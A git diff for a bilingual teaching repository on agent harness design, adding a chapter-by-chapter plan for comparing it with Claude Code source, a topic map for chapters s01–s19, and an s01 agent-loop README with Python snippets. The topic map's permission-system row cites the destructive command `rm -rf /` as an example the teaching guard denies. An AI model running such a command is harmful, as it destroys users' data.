` 折叠中有基于源码行号的逐项对照 +- [ ] 关键差异点有"教学版为什么简化"的说明 +- [ ] 复杂章有 SVG 图,简单章 code 够用 +- [ ] code.py 可独立运行 + +--- + +## Batch 1: 已有深度的章(微调) + +### s01 Agent Loop ✅ 已完成 +- query.ts 1729 行全量分析 +- State 11 字段 + 10 退出路径 + 7 继续路径 +- 改动:无需 + +### s02 Tool Use ✅ 已完成 +- Tool.ts + toolOrchestration.ts + StreamingToolExecutor.ts 分析 +- isConcurrencySafe vs isReadOnly 修正 +- 并发对比 SVG +- 改动:无需 + +### s08 Context Compact ✅ 已完成 +- compact.ts 1705 行 + autoCompact.ts 351 行全量分析 +- 5 层修正为 4 层管线 + 应急 +- 14 个精确常量 +- 改动:无需 + +--- + +## Batch 2: 亟待深化的复杂章(深度分析 + 重写 CC 对照) + +### s03 Permission System + +**CC 源码位置**: +- `src/Tool.ts` — checkPermissions(), PermissionResult 类型 +- `src/services/tools/toolExecution.ts` — checkPermissionsAndCallTool() 完整管线 +- `src/tools.ts` — canUseTool callback, permissionContext +- `src/query.ts` — permission 在循环中的调用点 +- YoloClassifier / auto-approve 逻辑 + +**分析重点**: +1. PermissionResult 的完整类型定义(allow/deny/ask 三种决策) +2. checkPermissions 的调用时机和参数 +3. canUseTool callback 的签名和作用 +4. 权限决策管线的精确顺序(schema → validateInput → hooks → permission → call) +5. YoloClassifier 如何自动批准 +6. permission bubbling 机制 + +**更新内容**: +- [ ] 重写 `
` 折叠:完整 PermissionResult 类型 + 管线顺序 + 行号 +- [ ] 补充 permission bubbling 概念 +- [ ] 术语小抄补上 + +--- + +### s04 Hooks System + +**CC 源码位置**: +- `src/services/tools/toolHooks.ts` (650 行) — PreToolUse/PostToolUse 钩子执行 +- `src/query.ts` — stop hooks, hook_stopped_continuation +- `src/hooks/` 目录 — 各类 React hooks(与教学无关),但 stop hooks 相关的逻辑在 query.ts +- `src/services/compact/postCompactCleanup.ts` — 压缩后钩子清理 + +**分析重点**: +1. PreToolUse hooks 的完整执行流程和返回值类型 +2. PostToolUse hooks 的触发时机 +3. Hook 返回值如何影响工具执行(preventContinuation, updatedInput, permissionDecision) +4. Stop hooks 的触发时机和处理逻辑 +5. 钩子注册和优先级机制 + +**更新内容**: +- [ ] 重写 `
` 折叠:PreToolUse/PostToolUse/Stop hooks 的完整类型 + 触发时机 + 行号 +- [ ] 教学版的 register_hook/trigger_hooks 与 CC 的差异对比 + +--- + +### s09 Memory System + +**CC 源码位置**: +- `src/services/extractMemories/extractMemories.ts` (615 行) — 记忆提取 +- `src/services/extractMemories/prompts.ts` — 提取 prompt +- `src/services/SessionMemory/sessionMemory.ts` (495 行) — 会话记忆 +- `src/services/SessionMemory/prompts.ts` — 记忆 prompt +- `src/services/autoDream/consolidationLock.ts` — 巩固锁 +- `src/query.ts` — 记忆加载和提取的调用点 + +**分析重点**: +1. MemorySelector 的筛选算法(embedding 相似度 vs 关键词) +2. ExtractMemories 的触发时机(stop hook 中,不是 autoCompact 后) +3. DreamConsolidator 的触发频率和逻辑 +4. 记忆的 JSON 结构(type、tags、timestamp、expires_at) +5. session memory vs user memory 的区分 +6. 记忆文件存储位置和格式 + +**更新内容**: +- [ ] 重写 `
` 折叠:三子系统的具体触发时机 + 数据结构 + 行号 +- [ ] 补充 session memory compact(s08 中回撤的那个机制) +- [ ] 术语小抄补上 + +--- + +### s11 Error Recovery + +**CC 源码位置**: +- `src/query.ts` — 全部恢复逻辑: + - max_tokens escalation (8K→64K) + - max_output_tokens recovery (续写提示,最多 3 次) + - collapse_drain_retry + - reactive_compact_retry + - stop_hook_blocking + - token_budget_continuation + - fallback model 切换 + - 指数退避 + +**分析重点**: +1. 7 种 Continue 路径的精确触发条件和行号(部分已在 s01 中覆盖) +2. 指数退避的具体参数(BASE_DELAY_MS, MAX_RETRIES, jitter) +3. fallback model 的切换逻辑 +4. max_tokens escalation 的单次限制 +5. reactiveCompact vs autoCompact 的触发差异 + +**更新内容**: +- [ ] 重写 `
` 折叠:四条恢复路径的精确条件 + 常量 + 行号 +- [ ] 添加错误恢复决策树 SVG +- [ ] 术语小抄补上 + +--- + +### s15 Agent Teams + +**CC 源码位置**: +- `src/hooks/useSwarmInitialization.ts` (81 行) — Team/Swarm 初始化 +- `src/hooks/useSwarmPermissionPoller.ts` (330 行) — 权限轮询 +- `src/hooks/useInboxPoller.ts` (969 行) — 收件箱轮询 +- `src/hooks/useTeammateViewAutoExit.ts` (63 行) — 队友自动退出 +- `src/Task.ts` — teammate 相关的 task 逻辑 +- `src/query.ts` — teammate idle notification, TaskCompleted hooks + +**分析重点**: +1. Teammate 的生命周期管理 +2. 收件箱的 JSONL 格式和读写锁 +3. 消息总线的实现方式 +4. permission bubbling 在 team 中的实际应用 +5. teammate 的 idle 通知机制 + +**更新内容**: +- [ ] 重写 `
` 折叠:team 拓扑 + 消息格式 + 权限冒泡 + 行号 +- [ ] 术语小抄补上 + +--- + +### s19 MCP Plugin + +**CC 源码位置**: +- `src/services/mcp/client.ts` (3348 行) — MCP Client 核心 +- `src/services/mcp/auth.ts` — MCP 认证 +- `src/services/mcp/config.ts` — MCP 配置 +- `src/services/mcp/channelPermissions.ts` (240 行) — 通道权限 +- `src/services/mcp/channelNotification.ts` — 通道通知 +- `src/services/mcp/channelAllowlist.ts` — 通道白名单 + +**分析重点**: +1. MCP Client 的连接生命周期(stdio/SSE/HTTP 三种 transport) +2. tools/list 和 tools/call 的 JSON-RPC 协议细节 +3. Channel 机制——MCP server 如何反向给 Agent 发消息 +4. 工具池合并的精确算法 +5. MCP tool 的命名规则(mcp__server__tool) + +**更新内容**: +- [ ] 重写 `
` 折叠:MCP 协议细节 + transport 类型 + channel 机制 + 行号 +- [ ] 术语小抄补上 + +--- + +## Batch 3: 中等复杂章(定向分析 + 补充 CC 对照) + +### s06 Subagent + +**CC 源码位置**: +- `src/tools/AgentTool/` — AgentTool 定义 +- `src/query.ts` — fork mode, fresh messages[] +- `src/Task.ts` — 子 Agent 的 task 绑定 + +**分析重点**: +1. fork mode vs fresh mode 的实际差异 +2. prompt cache 在子 Agent 中的共享机制 +3. 子 Agent 的上下文限制 + +**更新内容**: +- [ ] 补充 CC 源码对照折叠 +- [ ] 术语小抄 + +### s07 Skill Loading + +**CC 源码位置**: +- `src/setup.ts` — skill loading 初始化 +- `src/query.ts` — skill 注入点 +- `src/tools.ts` — skill 工具的注册 + +**分析重点**: +1. Skill 的目录结构和 manifest 格式 +2. 两级加载的具体实现 +3. Skill 内容注入方式(system prompt vs tool_result) + +**更新内容**: +- [ ] 补充 CC 源码对照折叠 +- [ ] 术语小抄 + +### s10 System Prompt + +**CC 源码位置**: +- `src/constants/systemPromptSections.ts` (68 行) — 所有 prompt section +- `src/constants/prompts.ts` (914 行) — 完整 prompt 模板 +- `src/context.ts` (189 行) — 上下文组装 +- `src/query.ts` — getSystemContext/getUserContext 调用点 + +**分析重点**: +1. system prompt 的 section 列表和顺序 +2. 运行时组装的逻辑(哪些始终加载,哪些按需) +3. memoize 缓存机制 + +**更新内容**: +- [ ] 补充 CC 源码对照折叠 +- [ ] 术语小抄 + +### s12 Task System + +**CC 源码位置**: +- `src/utils/tasks.ts` (862 行) — Task 数据结构和 CRUD +- `src/tools/TaskCreateTool/TaskCreateTool.ts` — 创建任务 +- `src/tools/TaskListTool/TaskListTool.ts` — 列出任务 +- `src/tools/TaskGetTool/TaskGetTool.ts` — 获取任务 +- `src/tools/TaskUpdateTool/TaskUpdateTool.ts` — 更新任务 +- `src/hooks/useTaskListWatcher.ts` (221 行) — 任务看板监听 + +**分析重点**: +1. TaskRecord 的完整字段(id, subject, status, owner, blockedBy, ...) +2. 任务状态机的所有合法转换 +3. claim task 的并发安全机制 +4. 任务文件存储格式 + +**更新内容**: +- [ ] 补充 CC 源码对照折叠 +- [ ] 术语小抄 +- [ ] 任务状态机 SVG + +### s13 Background Tasks + +**CC 源码位置**: +- `src/query.ts` — pendingToolUseSummary, notification queue, background execution + +**分析重点**: +1. background task 的线程模型 +2. notification queue 的注入时机 +3. 
pendingToolUseSummary 的生成(Haiku 后台摘要) + +**更新内容**: +- [ ] 补充 CC 源码对照折叠 +- [ ] 术语小抄 + +### s14 Cron Scheduler + +**CC 源码位置**: +- `src/hooks/useScheduledTasks.ts` (139 行) +- CC 的 cron job 存储和触发机制 + +**分析重点**: +1. durable vs session-only 的持久化方式 +2. cron 表达式的解析和匹配算法 +3. 调度器在主循环中的集成点 + +**更新内容**: +- [ ] 补充 CC 源码对照折叠 +- [ ] 术语小抄 + +--- + +## Batch 4: 概念章或教学虚构章(轻量分析) + +### s05 TodoWrite +- CC 中已被 Task 系统取代 +- [ ] 补充说明 CC 的演进路径 +- [ ] 术语小抄 + +### s16 Team Protocols +- shutdown_request/response 协议在 query.ts 中的实现 +- [ ] 轻量 CC 对照 + +### s17 Autonomous Agents +- 来新璐指出"真实 CC 里没有这套",是教学假设 +- [ ] 开篇诚实标注,不需要 CC 源码分析 +- [ ] 术语小抄 + +### s18 Worktree Isolation +- git worktree 命令的使用在 setup.ts/tools.ts 中 +- [ ] 轻量 CC 对照 + +--- + +## 执行顺序 + +``` +Batch 1 (已完成): s01, s02, s08 + +Batch 2 (深度分析, 本周): + Day 1: s03 Permission + s04 Hooks (并行跑 2 个 Agent) + Day 2: s09 Memory + s11 Error Recovery (并行跑 2 个 Agent) + Day 3: s15 Agent Teams + s19 MCP (并行跑 2 个 Agent) + +Batch 3 (定向分析, 后续): + s06 Subagent + s07 Skill Loading (并行) + s10 System Prompt + s12 Task System (并行) + s13 Background + s14 Cron (并行) + +Batch 4 (轻量, 最后): + s05 TodoWrite + s16 Team Protocols (并行) + s17 Autonomous + s18 Worktree (并行) +``` + +## 总工作量估算 + +| Batch | 章数 | 每章预估 | +|-------|------|---------| +| Batch 2 深度 | 6 章 | 2-3 Agent 调用 + 编辑 | +| Batch 3 定向 | 8 章 | 1-2 Agent 调用 + 编辑 | +| Batch 4 轻量 | 4 章 | 直接编辑 | +| **合计** | **18 章**(s01/s02/s08 已完成) | | diff --git a/docs/zh/s01-the-agent-loop.md b/docs/zh/s01-the-agent-loop.md index 86788dc98..5019e51f2 100644 --- a/docs/zh/s01-the-agent-loop.md +++ b/docs/zh/s01-the-agent-loop.md @@ -25,7 +25,7 @@ 一个退出条件控制整个流程。循环持续运行, 直到模型不再调用工具。 -## 工作原理 +## 工作原理 1. 
用户 prompt 作为第一条消息。

diff --git a/docs/zh/s03-todo-write.md b/docs/zh/s03-todo-write.md
index e593233a6..e77215eb7 100644
--- a/docs/zh/s03-todo-write.md
+++ b/docs/zh/s03-todo-write.md
@@ -26,7 +26,7 @@
 | [ ] task A |
 | [>] task B <- doing |
 | [x] task C |
-   +-----------------------+
+   +-----------------------+
        |
        if rounds_since_todo >= 3:
        inject into tool_result

diff --git a/s01-s19-topic-map.md b/s01-s19-topic-map.md
new file mode 100644
index 000000000..0658fd1d4
--- /dev/null
+++ b/s01-s19-topic-map.md
@@ -0,0 +1,118 @@
+# Learn Claude Code 主题划分分析
+
+这个仓库的主线不是在"写一个智能体大脑",而是在拆解 **Agent Harness 工程**。也就是:模型负责 agency,代码负责给模型提供工具、上下文、知识、任务状态、并发能力、团队协作和执行隔离。
+
+## 阶段划分
+
+| 阶段 | 范围 | 核心问题 |
+|---|---:|---|
+| 第一阶段:工具管线 | s01-s04 | 模型怎么动手、怎么加工具、怎么管权限、怎么拦截 |
+| 第二阶段:单 Agent 能力增强 | s05-s08 | 规划、上下文隔离、按需加载知识、压缩记忆 |
+| 第三阶段:知识与韧性 | s09-s11 | 跨压缩/跨会话记忆、运行时 prompt 组装、错误恢复 |
+| 第四阶段:持久化工作 | s12-s14 | 任务图、后台执行、定时调度 |
+| 第五阶段:多 Agent 平台 | s15-s19 | 团队协作、协议握手、自治认领、worktree 隔离、MCP 插件 |
+
+## s01-s04 主题内容(Phase 1: Tool Pipeline)
+
+> **核心问题**: 模型怎么动手?加工具不改循环怎么做到?怎么管权限?怎么在不动工具代码的前提下改工具行为?
+ +| 主题 | 名称 | Motto | 内容是什么 | +|---|---|---|---| +| s01 | Agent Loop | *"One loop & Bash is all you need"* | 最小 agent 内核:`messages -> LLM -> tool_use -> execute tool -> append tool_result -> loop`。只有一个 `bash` 工具,重点是理解 `stop_reason == "tool_use"` 时继续循环,否则结束。对应 `s01_agent_loop/code.py`。 | +| s02 | Tool Use | *"Adding a tool means adding one handler"* | 把单一 `bash` 扩展成工具分发系统。新增 `read_file`、`write_file`、`edit_file`、`glob`,通过 `TOOL_HANDLERS` dispatch map 按工具名路由。重点是:加工具不改 agent loop,只加 schema 和 handler。对应 `s02_tool_use/code.py`。 | +| s03 | Permission System | *"Set boundaries first, then grant freedom"* | 把"一刀切禁止"升级为分级策略。引入 `PermissionGuard`,定义 allow/ask/deny 三种模式,`ls` 直接放行,`rm -rf /` 直接拒绝,中间的需确认。权限是光谱,不是两个按钮。对应 `s03_permission/code.py`。 | +| s04 | Hook System | *"Hook around the loop, never rewrite the loop"* | 在工具执行前后插入拦截层。引入 `HookManager`,支持 `PreToolUse`/`PostToolUse` 事件,三种模式 observe/modify/block。不改工具代码,也能改变工具行为——开闭原则的实践。对应 `s04_hooks/code.py`。 | + +## s05-s08 主题内容(Phase 2: Single-Agent Capability) + +> **核心问题**: 单个 agent 怎么稳定干长任务?怎么规划?怎么隔离上下文?怎么加载知识?上下文满了怎么办? 
+ +| 主题 | 名称 | Motto | 内容是什么 | +|---|---|---|---| +| s05 | TodoWrite | *"An agent without a plan drifts"* | 给 agent 加会话内计划能力。`TodoManager` 维护 `pending / in_progress / completed`,且只允许一个任务处于 `in_progress`。还有 nag reminder:多轮不更新 todo 就注入提醒。重点是防止多步任务跑偏。对应 `s05_todo_write/code.py`。 | +| s06 | Subagent | *"Big tasks split small, each subtask gets clean context"* | 引入一次性子 agent。父 agent 通过 `task` 工具派生子 agent,子 agent 使用独立 `messages[]`,完成后只返回摘要。重点是上下文隔离:子任务读了很多文件,父上下文只收到结论。对应 `s06_subagent/code.py`。 | +| s07 | Skill Loading | *"Load knowledge on demand, not upfront"* | 引入按需知识加载。`SkillLoader` 扫描 skill 定义,系统提示里只放名称和描述,模型需要时调用 `load_skill` 注入完整内容。重点是避免把全部领域知识塞进 system prompt。对应 `s07_skill_loading/code.py`。 | +| s08 | Context Compact | *"Context always fills up -- have a way to make room"* | 引入上下文压缩。四层策略:snip_compact 裁旧对话、micro_compact 旧工具结果占位、tool_result_budget 大结果落盘、compact_history LLM 全量摘要。重点是让长任务不会被上下文窗口限制。对应 `s08_context_compact/code.py`。 | + +## s09-s11 主题内容(Phase 3: Knowledge and Resilience) + +> **核心问题**: 压缩会丢信息,怎么跨压缩/跨会话保持知识?prompt 怎么管理才不膨胀?出错怎么恢复? + +| 主题 | 名称 | Motto | 内容是什么 | +|---|---|---|---| +| s09 | Memory | *"Remember what matters, forget what doesn't"* | 引入持久记忆。三个子系统:Loading 每轮筛选相关记忆加载,Extraction 在 autoCompact 后自动发现偏好,Consolidation 定期整理去重。压缩是有损的,记忆系统补回了丢失的细节。对应 `s09_memory/code.py`。 | +| s10 | System Prompt | *"Prompts are assembled at runtime, not hardcoded"* | 把硬编码的 system prompt 拆成 `PROMPT_SECTIONS` 分段定义,按需拼接 `assemble_system_prompt`,加缓存避免重复组装。换项目只改 section,不改整个 prompt。对应 `s10_system_prompt/code.py`。 | +| s11 | Error Recovery | *"Errors aren't the end, they're the start of a retry"* | 三种恢复模式:输出截断时升级 max_tokens + 续写,上下文超限时 reactive compact,临时故障时指数退避 + 抖动重试。重点是错误不是终点,是分类 → 恢复的起点。对应 `s11_error_recovery/code.py`。 | + +## s12-s14 主题内容(Phase 4: Durable Work) + +> **核心问题**: 目标怎么跨会话存在?慢操作怎么不阻塞?周期性任务怎么自动触发? 
+ +| 主题 | 名称 | Motto | 内容是什么 | +|---|---|---|---| +| s12 | Task System | *"Big goals break into small tasks, ordered, persisted to disk"* | 把 s05 的内存 todo 升级成磁盘持久化任务图。每个任务写成 JSON 文件,支持 `blockedBy` 依赖、`pending → in_progress → completed` 状态流转、完成后自动解锁后续任务。重点是让目标跨压缩、跨进程、跨会话存在。对应 `s12_task_system/code.py`。 | +| s13 | Background Tasks | *"Slow ops go background, agent keeps thinking"* | 引入后台执行。`BackgroundManager` 用线程运行慢命令,主 agent loop 继续工作;后台完成后通过通知队列把结果注入下一轮 LLM 上下文。重点是 `pytest`、`npm install` 不再阻塞 agent 思考。对应 `s13_background_tasks/code.py`。 | +| s14 | Cron Scheduler | *"Fire on schedule, no human kick needed"* | 引入定时调度。独立 cron 线程 + 任务队列,支持持久化(`durable: true`,写入 `scheduled_tasks.json`)和会话级两种模式。重点是 Agent 自己按时间表做事,不需要人来推。对应 `s14_cron_scheduler/code.py`。 | + +## s15-s19 主题内容(Phase 5: Multi-Agent Platform) + +> **核心问题**: 单 agent 搞不定的任务怎么分工?队友间怎么通信?怎么让队友自己找活?多个 agent 怎么避免文件冲突?外部工具怎么接入? + +| 主题 | 名称 | Motto | 内容是什么 | +|---|---|---|---| +| s15 | Agent Teams | *"Too big for one agent -- delegate to teammates"* | 引入持久队友。`TeammateManager` 创建有名字、有角色、有状态的 teammate,每个 teammate 有自己的 agent loop;`MessageBus` 用 JSONL 文件做异步邮箱。重点是从一次性 subagent 进化到持久协作 agent。对应 `s15_agent_teams/code.py`。 | +| s16 | Team Protocols | *"Teammates need shared communication rules"* | 给团队通信加协议。核心模式是 `request_id + pending/approved/rejected FSM`,用于 graceful shutdown 和 plan approval。重点是:队友之间不能只靠自由文本聊天,高风险动作要有结构化握手。对应 `s16_team_protocols/code.py`。 | +| s17 | Autonomous Agents | *"Teammates check the board, claim work themselves"* | 让队友具备自治能力。teammate 空闲后会轮询 inbox 和任务看板,发现未认领且未阻塞的任务就自动 claim;同时有 idle timeout 和身份重注入,防止压缩后忘记自己是谁。重点是从"领导分配任务"走向"队友自己找活"。对应 `s17_autonomous_agents/code.py`。 | +| s18 | Worktree Isolation | *"Each works in its own directory, no interference"* | 给任务绑定独立 git worktree。`.tasks/` 是控制面,`.worktrees/` 是执行面,任务 ID 和 worktree 绑定;支持创建、运行命令、保留、删除、事件日志。重点是多个 agent 并行改代码时目录隔离,避免互相覆盖。对应 `s18_worktree_isolation/code.py`。 | +| s19 | MCP Plugin | *"Not enough capability? 
Plug in more via MCP"* | 引入 MCP 外部工具协议。`MCPClient` 模拟 `tools/list` + `tools/call` 发现和调用外部工具;`assemble_tool_pool` 把内置工具和 MCP 工具合并成一个池子,`mcp__{server}__{tool}` 命名避免冲突。重点是外部能力通过标准协议接入,不需要重写工具代码。对应 `s19_mcp_plugin/code.py`。 | + +## 最关键的递进关系 + +s01-s02 解决"模型怎么动手"。一个循环,一个分发表,加工具不改循环。 + +s03-s04 解决"怎么管住模型的动手"。权限是光谱不是开关,拦截在外不在内。 + +s05-s08 解决"单个 agent 怎么稳定干长任务"。先列计划,再隔离上下文,按需加载知识,满了就压缩。 + +s09-s11 解决"知识和韧性怎么跨会话存在"。压缩会丢信息——记忆补回来;prompt 别写死——运行时组装;出错别崩——分类恢复。 + +s12-s14 解决"目标和执行怎么脱离单次对话"。任务持久化到磁盘,慢操作丢后台,定时任务自动触发。 + +s15-s19 解决"多 agent 怎么协作、自治、隔离、扩展"。持久队友 + 异步邮箱、协议握手、自治认领、worktree 目录隔离、MCP 外部工具接入。 + +## 层级 (Harness Layer) 划分 + +| Layer | Harness 层 | 章节 | +|-------|-----------|------| +| 循环 | 基础连接 | s01 | +| 分发 | 扩展边界 | s02 | +| 安全门 | 权限管线 | s03 | +| 扩展点 | 钩子拦截 | s04 | +| 规划 | 会内计划 | s05 | +| 隔离 | 子上下文 | s06 | +| 知识 | 按需加载 | s07 | +| 压缩 | 上下文管理 | s08 | +| 记忆 | 跨会话积累 | s09 | +| 提示 | 运行时组装 | s10 | +| 韧性 | 错误恢复 | s11 | +| 任务 | 持久目标 | s12 | +| 后台 | 异步执行 | s13 | +| 调度 | 定时触发 | s14 | +| 团队 | 持久队友 | s15 | +| 协议 | 结构化握手 | s16 | +| 自治 | 自主认领 | s17 | +| 隔离 | 目录隔离 | s18 | +| 插件 | 外部能力 | s19 | + +## 推荐阅读顺序 + +1. 先读根目录 `README.md`,把"模型负责 agency,harness 负责落地"的基本立场立住。 +2. 按顺序读 `s01_agent_loop/README.md` 到 `s19_mcp_plugin/README.md`,每章只关注新增机制。 +3. 对照运行各章 `code.py`,看每章新增的工具和类。 +4. 最后读 `s_full/code.py`,把所有机制合成一张完整 harness 架构图。 + +## 递进规则 + +每个章节只做一件事:在上一个章节的基础上,加一个新机制。核心循环 `while True` 从 s01 到 s19 从未改变。循环属于 agent,机制属于 harness。 + + diff --git a/s01_agent_loop/README.en.md b/s01_agent_loop/README.en.md new file mode 100644 index 000000000..77503ed5e --- /dev/null +++ b/s01_agent_loop/README.en.md @@ -0,0 +1,193 @@ +# s01: The Agent Loop — One Loop Is All You Need + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +`s01` → [s02](../s02_tool_use/) → s03 → s04 → ... → s19 +> *"One loop & Bash is all you need"* — One tool + one loop = one Agent. +> +> **Harness Layer**: The Loop — the first bridge between the model and the real world. 
+ +--- + +## The Problem + +Language models can reason about code, but they can't touch the real world — they can't read files, run commands, or see error messages. + +You could give it a tool (like bash), and it would get a result on the first call. But then what? + +**You copy-paste the result back into the chat and ask it to continue.** You become the loop. What we need is to automate that copy-paste. + +--- + +## The Solution + +![Agent Loop](images/agent-loop.en.svg) + +A `while True` loop: keep going when the model calls a tool, stop when it doesn't. The entire process hinges on two signals: + +| Signal | Meaning | Loop Action | +|--------|---------|-------------| +| `stop_reason == "tool_use"` | Model raises hand: "I need a tool" | Execute → feed result back → continue | +| `stop_reason != "tool_use"` | Model says: "I'm done" | Exit loop | + +--- + +## How It Works + +Let's translate this process into code. Step by step: + +**Step 1**: Start with the user's question as the first message. + +```python +messages = [{"role": "user", "content": query}] +``` + +**Step 2**: Send the messages and tool definitions to the LLM. + +```python +response = client.messages.create( + model=MODEL, system=SYSTEM, messages=messages, + tools=TOOLS, max_tokens=8000, +) +``` + +**Step 3**: Append the model's response and check whether it called a tool. No tool call → done. + +```python +messages.append({"role": "assistant", "content": response.content}) +if response.stop_reason != "tool_use": + return +``` + +**Step 4**: Execute the tool the model requested and collect the results. + +```python +results = [] +for block in response.content: + if block.type == "tool_use": + output = run_bash(block.input["command"]) + results.append({ + "type": "tool_result", + "tool_use_id": block.id, + "content": output, + }) +``` + +**Step 5**: Append the tool results as a new message and go back to Step 2. 
+ +```python +messages.append({"role": "user", "content": results}) +``` + +Assembled into a complete function: + +```python +def agent_loop(messages): + while True: + response = client.messages.create( + model=MODEL, system=SYSTEM, messages=messages, + tools=TOOLS, max_tokens=8000, + ) + messages.append({"role": "assistant", "content": response.content}) + + if response.stop_reason != "tool_use": + return + + results = [] + for block in response.content: + if block.type == "tool_use": + output = run_bash(block.input["command"]) + results.append({ + "type": "tool_result", + "tool_use_id": block.id, + "content": output, + }) + messages.append({"role": "user", "content": results}) +``` + +Under 30 lines — that's the entire Agent. The next 18 chapters all add mechanisms on top of this loop. The loop itself never changes. + +--- + +## Try It + +```sh +cd learn-claude-code +python s01_agent_loop/code.py +``` + +Try these prompts: + +1. `Create a file called hello.py that prints "Hello, World!"` +2. `List all Python files in this directory` +3. `What is the current git branch?` + +What to watch for: When does the model call a tool (loop continues), and when does it not (loop ends)? + +--- + +## What's Next + +Right now the model only has bash — reading files requires `cat`, writing files requires `echo ... >`, finding files requires `find`. Ugly and error-prone. + +→ s02 Tool Use: What happens when we give it 5 proper tools? Will the model call multiple tools at once? Will parallel tool executions step on each other? + +
+Dive into CC Source Code + +> The following is based on a complete analysis of CC source code `src/query.ts` (1729 lines). The core differences are twofold: CC doesn't check the `stop_reason` field but instead inspects whether the content contains `tool_use` blocks (because `stop_reason` is unreliable in streaming responses); CC has more exit paths and recovery strategies for production-grade protection. + +**The 30-line `while True` from the teaching version IS the core of CC's 1729 lines.** Everything below is a protection mechanism layered on top of that core. + +
+1. Loop Structure Differences + +The teaching version checks `response.stop_reason`. CC doesn't use this field — in streaming responses, `stop_reason` may not have updated yet even though `tool_use` blocks are already present in the content. CC uses a `needsFollowUp` flag: during streaming message reception (`query.ts:832-835`), it's set to `true` whenever a `tool_use` block is detected. + +```typescript +// query.ts:554-558 +// stop_reason === 'tool_use' is unreliable. +// Set during streaming whenever a tool_use block arrives. +let needsFollowUp = false +``` + +
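+In the teaching version's Python terms, the same content-based check (trusting the blocks rather than `stop_reason`) is a one-liner. A sketch over plain dict blocks, not the SDK's response objects or CC's actual code:
+
+```python
+def needs_follow_up(content_blocks) -> bool:
+    """True if the assistant message contains at least one tool_use block."""
+    return any(block.get("type") == "tool_use" for block in content_blocks)
+```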
+ +
+2. State Object — All 11 Fields (Teaching Version Only Uses messages) + +| # | Field | Purpose | Chapter | +|---|-------|---------|---------| +| 1 | `messages` | Message array for the current iteration | s01 | +| 2 | `toolUseContext` | Tool, signal, and permission context | s02 | +| 3 | `autoCompactTracking` | Compaction state tracking | s08 | +| 4 | `maxOutputTokensRecoveryCount` | Token recovery attempt count (max 3) | s11 | +| 5 | `hasAttemptedReactiveCompact` | Whether reactive compaction was attempted this round | s08 | +| 6 | `maxOutputTokensOverride` | 8K→64K upgrade override | s11 | +| 7 | `pendingToolUseSummary` | Background Haiku-generated tool use summary | s08 | +| 8 | `stopHookActive` | Whether the stop hook produced a blocking error | s04 | +| 9 | `turnCount` | Turn count (for maxTurns check) | s01 | +| 10 | `transition` | Last continue reason | s11 | +| 11 | `taskBudgetRemaining` | Cross-compaction-boundary task_budget | s05 | + +
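+Transcribed into the teaching version's Python, the table above might look like the dataclass below. The field names come from the table; the types and defaults are guesses for illustration, not CC's actual definitions:
+
+```python
+from dataclasses import dataclass, field
+from typing import Optional
+
+@dataclass
+class LoopState:
+    """Sketch of CC's per-iteration loop state (types are assumptions)."""
+    messages: list = field(default_factory=list)            # s01
+    tool_use_context: dict = field(default_factory=dict)    # s02
+    auto_compact_tracking: dict = field(default_factory=dict)  # s08
+    max_output_tokens_recovery_count: int = 0               # s11, capped at 3
+    has_attempted_reactive_compact: bool = False            # s08
+    max_output_tokens_override: Optional[int] = None        # s11, 8K -> 64K
+    pending_tool_use_summary: Optional[str] = None          # s08
+    stop_hook_active: bool = False                          # s04
+    turn_count: int = 0                                     # s01, maxTurns check
+    transition: Optional[str] = None                        # s11, last continue reason
+    task_budget_remaining: Optional[int] = None             # s05
+```
+
+Most later chapters each add one or two of these fields; the table's chapter column tells you where.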
+ +
+3. Exit Paths (10) and Continue Paths (7) + +The teaching version has only 1 exit path. CC has 10 `return` points and 7 "continue" modes (not exiting but entering the next round for different reasons). This is the protection layer required for a production-grade Agent — timeouts, budget overruns, user interruptions, tool execution abortions, etc. Each scenario has a corresponding recovery or exit strategy. + +
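+To make the contrast concrete: the teaching loop either returns or appends tool results, nothing else. A caricature of what multiple named exit and continue paths look like — the conditions and reason strings below are illustrative, not CC's actual logic:
+
+```python
+MAX_TURNS = 50  # illustrative constant, not CC's value
+
+def next_action(state: dict) -> str:
+    """Decide whether the loop exits or continues, and record why (a sketch)."""
+    # Exit paths: each returns a distinct reason instead of just falling out.
+    if state.get("aborted"):
+        return "exit:user_interrupt"
+    if state["turn_count"] >= MAX_TURNS:
+        return "exit:max_turns"
+    if not state.get("needs_follow_up"):
+        return "exit:no_tool_use"
+    # Continue paths: same loop, different reason recorded as the transition.
+    if state.get("output_truncated"):
+        return "continue:max_tokens_escalation"
+    if state.get("context_overflow"):
+        return "continue:reactive_compact"
+    return "continue:tool_results"
+```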
+ +
+4. Streaming Tool Execution and QueryEngine + +CC's `StreamingToolExecutor` (`query.ts:561`) allows tools to begin parallel execution while the model is still generating. `QueryEngine.ts` adds additional protections for cost overruns, structured output validation failures, and more. The teaching version doesn't implement these — the goal is conceptual clarity, not peak performance. + +
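+A toy sketch of the "start executing while still streaming" idea — a thread pool fed block by block, nothing like CC's real `StreamingToolExecutor`:
+
+```python
+from concurrent.futures import ThreadPoolExecutor
+
+def stream_and_execute(blocks, run_tool):
+    """Submit each tool_use block for execution as soon as it arrives,
+    instead of waiting for the full assistant message."""
+    results = []
+    with ThreadPoolExecutor(max_workers=4) as pool:
+        futures = []
+        for block in blocks:  # stand-in for an incremental stream
+            if block["type"] == "tool_use":
+                futures.append((block["id"], pool.submit(run_tool, block["input"])))
+        for block_id, future in futures:
+            results.append({"tool_use_id": block_id, "content": future.result()})
+    return results
+```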
+ +**In one sentence**: The core of query.ts's 1729 lines is a 30-line `while True`. All the complex fields and exit paths are protection mechanisms. Understand the core loop first, and everything that follows unfolds naturally. + +
